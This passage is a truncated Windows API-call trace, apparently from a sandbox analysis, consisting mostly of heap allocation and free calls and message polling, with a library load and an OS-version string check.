hHeap=0x25c0000) returned 1 [0206.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.424] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.425] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.426] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.426] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.426] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.427] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.428] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.428] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.428] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.429] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.429] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.430] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.430] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.431] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0206.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.431] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.432] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.432] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.432] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0206.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.433] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.434] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.434] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.434] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.435] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.435] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.436] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.436] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.437] HeapFree (in: 